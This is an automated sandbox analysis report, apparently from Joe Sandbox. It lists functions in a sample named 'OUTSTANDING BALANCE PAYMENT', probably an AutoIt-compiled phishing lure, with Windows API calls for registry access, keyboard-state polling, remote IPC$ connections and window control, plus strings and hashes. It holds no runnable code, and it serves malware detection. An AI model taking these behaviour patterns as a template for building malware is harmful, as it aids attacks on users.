                                                                  • Opcode ID: bcaeb7791c689a7e04b5e3bf8e1ff128bba01200986b0cbf21384ec2b2b9d913
                                                                  • Instruction ID: cc10900de13a14fbcf8fbdd2c4eb495081f33365740426c2cb06198ed8f8c914
                                                                  • Opcode Fuzzy Hash: bcaeb7791c689a7e04b5e3bf8e1ff128bba01200986b0cbf21384ec2b2b9d913
                                                                  • Instruction Fuzzy Hash: 27513875900309AFCB15CFA8D885EAEBBB9EF48310F14851EF95AA7350D771AD41CB90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-2391861430
                                                                  • Opcode ID: 5918e0c6258f690f92ab08a296764f21cb3d5e00a04668678864877b50e83b8f
                                                                  • Instruction ID: 2b2e7fa06263c9492e0b6eab5a1b2a93ab084df2cf520317068c418e3d443516
                                                                  • Opcode Fuzzy Hash: 5918e0c6258f690f92ab08a296764f21cb3d5e00a04668678864877b50e83b8f
                                                                  • Instruction Fuzzy Hash: 02517E35811519AACB15FBE0CD46EEEB778AF09304F204169F509721A2EB316F69DF60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-3420473620
                                                                  • Opcode ID: 37fb827a0d774a0b54c314f9cf31d898f1154bb8be20b611dace50751c8c4f56
                                                                  • Instruction ID: 0aa5b3a2e336b3774847ce186422b9187edcdc29e78769445803a6de445f71a3
                                                                  • Opcode Fuzzy Hash: 37fb827a0d774a0b54c314f9cf31d898f1154bb8be20b611dace50751c8c4f56
                                                                  • Instruction Fuzzy Hash: 4051B135810619AACB15FBE0CD46FEEB778AF05304F204166F50972092EB756FA9DF60
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: $E3$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-1697164405
                                                                  • Opcode ID: 2042f5927bdb25fad5585c631afebc3324cf41c470225c4592355499c3218cf8
                                                                  • Instruction ID: c5e169aa595591c568fced98dd85bad0d4812279cb55b656c118a057d81515d7
                                                                  • Opcode Fuzzy Hash: 2042f5927bdb25fad5585c631afebc3324cf41c470225c4592355499c3218cf8
                                                                  • Instruction Fuzzy Hash: 46417E3517028A9BDF05EF11DC85AEA3365BF12701F914855EC955B392EB70EE2ACF10
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C55D7
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 002C5664
                                                                  • GetMenuItemCount.USER32(00341708), ref: 002C56ED
                                                                  • DeleteMenu.USER32(00341708,00000005,00000000,000000F5,?,?), ref: 002C577D
                                                                  • DeleteMenu.USER32(00341708,00000004,00000000), ref: 002C5785
                                                                  • DeleteMenu.USER32(00341708,00000006,00000000), ref: 002C578D
                                                                  • DeleteMenu.USER32(00341708,00000003,00000000), ref: 002C5795
                                                                  • GetMenuItemCount.USER32(00341708), ref: 002C579D
                                                                  • SetMenuItemInfoW.USER32(00341708,00000004,00000000,00000030), ref: 002C57D3
                                                                  • GetCursorPos.USER32(?), ref: 002C57DD
                                                                  • SetForegroundWindow.USER32(00000000), ref: 002C57E6
                                                                  • TrackPopupMenuEx.USER32(00341708,00000000,?,00000000,00000000,00000000), ref: 002C57F9
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C5805
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: 7aa33ecdb51ff605063157dea72716e2640c4940ae630839a28ab49fa83f1b92
                                                                  • Instruction ID: cf8eeac666f571391035be9d6b65117582b3991311e70958951731bc23e21b65
                                                                  • Opcode Fuzzy Hash: 7aa33ecdb51ff605063157dea72716e2640c4940ae630839a28ab49fa83f1b92
                                                                  • Instruction Fuzzy Hash: A471F630661A26BEEB219F54CC59FAABF69FF01364F240309F5146A1D1C7B1B8A0DB50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002BA1DC
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002BA211
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002BA22D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002BA249
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002BA273
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002BA29B
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002BA2A6
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002BA2AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1687751970-22481851
                                                                  • Opcode ID: 1cda14a6bd231237acda910ab640bd802511bdff1e38a0298773da591c16b0ba
                                                                  • Instruction ID: 5bc4df57fcd533d34a47c79a9a0253fb6b06ab43c2b1a0a8b3697e6a18521bfd
                                                                  • Opcode Fuzzy Hash: 1cda14a6bd231237acda910ab640bd802511bdff1e38a0298773da591c16b0ba
                                                                  • Instruction Fuzzy Hash: 0041E87AC21629ABDB11EFA4DC95DEEB7B8BF04344F00402AE815A71A1EB709E15CF50
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 002C67FD
                                                                  • __swprintf.LIBCMT ref: 002C680A
                                                                    • Part of subcall function 002A172B: __woutput_l.LIBCMT ref: 002A1784
                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 002C6834
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002C6840
                                                                  • LockResource.KERNEL32(00000000), ref: 002C684D
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 002C686D
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002C687F
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002C688E
                                                                  • LockResource.KERNEL32(?), ref: 002C689A
                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002C68F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                  • String ID: 53
                                                                  • API String ID: 1433390588-4191172412
                                                                  • Opcode ID: 68411ba2d3836ed6fc353429ee6e055f276b74a5a3f9edc5f1ea19fc5eb134a4
                                                                  • Instruction ID: d517c9e8c4ada4b43a35f6ff33f33595f1e08d76e68ec13b3368abedbdc4bfab
                                                                  • Opcode Fuzzy Hash: 68411ba2d3836ed6fc353429ee6e055f276b74a5a3f9edc5f1ea19fc5eb134a4
                                                                  • Instruction Fuzzy Hash: D731B27591121BABDB129FA0DD58EBF7BACEF09340F00462AF901D2150E774D965DBA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002F36F4,00000010,?,Bad directive syntax error,0031DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002C25D6
                                                                  • LoadStringW.USER32(00000000,?,002F36F4,00000010), ref: 002C25DD
                                                                  • _wprintf.LIBCMT ref: 002C2610
                                                                  • __swprintf.LIBCMT ref: 002C2632
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002C26A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 1080873982-4153970271
                                                                  • Opcode ID: 6ba9e7dbbf0afb3932c6d05e14615f8542eedc872e1e9d25afde6106d2e4d477
                                                                  • Instruction ID: f04fe8af26177c33673f2ed7d24581b961059096bfb98e21b5c41c472d88b33b
                                                                  • Opcode Fuzzy Hash: 6ba9e7dbbf0afb3932c6d05e14615f8542eedc872e1e9d25afde6106d2e4d477
                                                                  • Instruction Fuzzy Hash: 7C214D3582021AAFCF16BF90CC4AFEE7B79BF19304F044459F505660A2DB75A668DF60
                                                                  APIs
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002C7B42
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002C7B58
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002C7B69
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002C7B7B
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002C7B8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: SendString
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 890592661-1007645807
                                                                  • Opcode ID: 3845d028a5994b931ddf72e1451f97e8eea46552c3bed309d4b09a5a849f5bef
                                                                  • Instruction ID: 8105a50a7b251eec257bd7b11e5033f237fcf72ebc515cf0cff43329d8c003a5
                                                                  • Opcode Fuzzy Hash: 3845d028a5994b931ddf72e1451f97e8eea46552c3bed309d4b09a5a849f5bef
                                                                  • Instruction Fuzzy Hash: C911C4A466126979D721B761CC8AEFFBABCEFD1B04F000519B411A60C1DA701E58CEB0
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 002C7794
                                                                    • Part of subcall function 0029DC38: timeGetTime.WINMM(?,7694B400,002F58AB), ref: 0029DC3C
                                                                  • Sleep.KERNEL32(0000000A), ref: 002C77C0
                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002C77E4
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 002C7806
                                                                  • SetActiveWindow.USER32 ref: 002C7825
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002C7833
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 002C7852
                                                                  • Sleep.KERNEL32(000000FA), ref: 002C785D
                                                                  • IsWindow.USER32 ref: 002C7869
                                                                  • EndDialog.USER32(00000000), ref: 002C787A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: 6fe4d00d1d80cc84a22da639c83088a58139c3c7baf053e5411094c7458db186
                                                                  • Instruction ID: 841a807776c47fbece619f2618954970aa080a6668a1d36658cd0f95ec89cab4
                                                                  • Opcode Fuzzy Hash: 6fe4d00d1d80cc84a22da639c83088a58139c3c7baf053e5411094c7458db186
                                                                  • Instruction Fuzzy Hash: 9C215078215209AFE7075FA0EC99F667F7DFB46348F400229F54587162CF61AC24DE20
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CoInitialize.OLE32(00000000), ref: 002D034B
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002D03DE
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 002D03F2
                                                                  • CoCreateInstance.OLE32(0030DA8C,00000000,00000001,00333CF8,?), ref: 002D043E
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002D04AD
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 002D0505
                                                                  • _memset.LIBCMT ref: 002D0542
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 002D057E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002D05A1
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 002D05A8
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002D05DF
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 002D05E1
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: 943f28e491bfe9df8add459438b4fb24eafbdc9c7ecaed1def3c12e00eb3f79e
                                                                  • Instruction ID: 4901cfbe8ef5f91a442a322ec05244452a24e0a38a86d2270eacbbe4612eaa6d
                                                                  • Opcode Fuzzy Hash: 943f28e491bfe9df8add459438b4fb24eafbdc9c7ecaed1def3c12e00eb3f79e
                                                                  • Instruction Fuzzy Hash: 14B1D975A10109AFDB05DFA4C898EAEBBB9FF48304F14849AE905EB261DB70ED51CF50
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 002C2ED6
                                                                  • SetKeyboardState.USER32(?), ref: 002C2F41
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 002C2F61
                                                                  • GetKeyState.USER32(000000A0), ref: 002C2F78
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002C2FA7
                                                                  • GetKeyState.USER32(000000A1), ref: 002C2FB8
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 002C2FE4
                                                                  • GetKeyState.USER32(00000011), ref: 002C2FF2
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 002C301B
                                                                  • GetKeyState.USER32(00000012), ref: 002C3029
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002C3052
                                                                  • GetKeyState.USER32(0000005B), ref: 002C3060
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: ad218e6014ddce8c53a7a54bda747b94cb8730b7b4dd7a6d202f340d35d42326
                                                                  • Instruction ID: f48fec2f184c48c54ba5a4eccd072ac2a662b8167509e9806cb2ec937047ee00
                                                                  • Opcode Fuzzy Hash: ad218e6014ddce8c53a7a54bda747b94cb8730b7b4dd7a6d202f340d35d42326
                                                                  • Instruction Fuzzy Hash: 2651E92191478969FB35EFA48810FEABFF45F11340F08879DC5C2565C2DE94AB9CCBA2
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 002BED1E
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BED30
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002BED8E
                                                                  • GetDlgItem.USER32(?,00000002), ref: 002BED99
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BEDAB
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002BEE01
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEE0F
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BEE20
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002BEE63
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 002BEE71
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002BEE8E
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 002BEE9B
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: f78a3fbcd8c7caeeff7a0c7cdac62298b4d2f47731c21c99c44691ea73ad3810
                                                                  • Instruction ID: 7a73ccb17a1ace7bb96fc4ad7054ffb8dd1b53abfeaecdc1f46a8685d1603caa
                                                                  • Opcode Fuzzy Hash: f78a3fbcd8c7caeeff7a0c7cdac62298b4d2f47731c21c99c44691ea73ad3810
                                                                  • Instruction Fuzzy Hash: 875121B1B10209AFDF18CFA8DD95AAEBBFAEB88310F558129F519D7290D771DD008B10
                                                                  APIs
                                                                    • Part of subcall function 0029B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0029B759,?,00000000,?,?,?,?,0029B72B,00000000,?), ref: 0029BA58
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0029B72B), ref: 0029B7F6
                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 0029B88D
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 002FD8A6
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD8D7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD8EE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD90A
                                                                  • DeleteObject.GDI32(00000000), ref: 002FD91C
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: a71104368153b09936ead30695d89a549b265d1464455b7bc4c766860ee35fc8
                                                                  • Instruction ID: 7988c95462d42f9b7455ec3dcfd26982f01f9741cd8bad0d0f9e249bf4733109
                                                                  • Opcode Fuzzy Hash: a71104368153b09936ead30695d89a549b265d1464455b7bc4c766860ee35fc8
                                                                  • Instruction Fuzzy Hash: E761DE35421A05DFDF239F94EA88B35B7FAFB85352F150129E4464AA60CBB4B8A0CF40
                                                                  APIs
                                                                    • Part of subcall function 0029B526: GetWindowLongW.USER32(?,000000EB), ref: 0029B537
                                                                  • GetSysColor.USER32(0000000F), ref: 0029B438
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 4cadd12f3e0175723112f075b65cea8c26a6fa263e221e015b128691e0057d39
                                                                  • Instruction ID: 71baaf8a33937caf749a39e1b2b24384f06d228f14eb0120f0559631300d2f1f
                                                                  • Opcode Fuzzy Hash: 4cadd12f3e0175723112f075b65cea8c26a6fa263e221e015b128691e0057d39
                                                                  • Instruction Fuzzy Hash: 0E4107300111449FDF265F68EDA9BB93BAAEB06731F144261FE658F1E2C7308C51EB21
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  • Opcode ID: 3cb4edd2ac896b9c50ccaaf0947bfc54af4217ac9f61ac890f61593d85411dea
                                                                  • Instruction ID: 7a23e95202c3b4b7f6385abd79ed2424e81b7ef5b06c47d407086ef005954289
                                                                  • Opcode Fuzzy Hash: 3cb4edd2ac896b9c50ccaaf0947bfc54af4217ac9f61ac890f61593d85411dea
                                                                  • Instruction Fuzzy Hash: 12414F7689521CAFCF61DB90CC85DCA73BDEB49310F0041A7B649A2041EE30ABF58F50
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(0031DC00,0031DC00,0031DC00), ref: 002CD7CE
                                                                  • GetDriveTypeW.KERNEL32(?,00333A70,00000061), ref: 002CD898
                                                                  • _wcscpy.LIBCMT ref: 002CD8C2
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 1ccc8c4b1daa5cecaea377443aa4f0bf4ce89d5fa6926807f15c29ad6cb28744
                                                                  • Instruction ID: b8a23f0ce4844333fe26f656ea8a33b3d4a0f65da39c477b061eeaa747e53898
                                                                  • Opcode Fuzzy Hash: 1ccc8c4b1daa5cecaea377443aa4f0bf4ce89d5fa6926807f15c29ad6cb28744
                                                                  • Instruction Fuzzy Hash: B1518235124201AFCB00EF14D891FAEB7A5FF84714F208A2EF49957292DB71DD25CB42
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 002893AB
                                                                  • __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 002A1557: _xtow@16.LIBCMT ref: 002A1578
                                                                  Similarity
                                                                  • API ID: __itow__swprintf_xtow@16
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 1502193981-2263619337
                                                                  • Opcode ID: 114f550cae48ac1d37a2780c2316dd7f430b55b875d40e81a7833e038b0fa544
                                                                  • Instruction ID: cd9bb88650d7bb0800e898b6fdedc6f429c054e51b543d4b09f1f7f8645bc8f7
                                                                  • Opcode Fuzzy Hash: 114f550cae48ac1d37a2780c2316dd7f430b55b875d40e81a7833e038b0fa544
                                                                  • Instruction Fuzzy Hash: 5841F535531209ABDB24FF34D942E7AB3E8EF48350F2444BBE14AD71C1EAB19961CB10
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002EA259
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 002EA260
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002EA273
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002EA27B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 002EA286
                                                                  • DeleteDC.GDI32(00000000), ref: 002EA28F
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002EA299
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002EA2AD
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002EA2B9
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
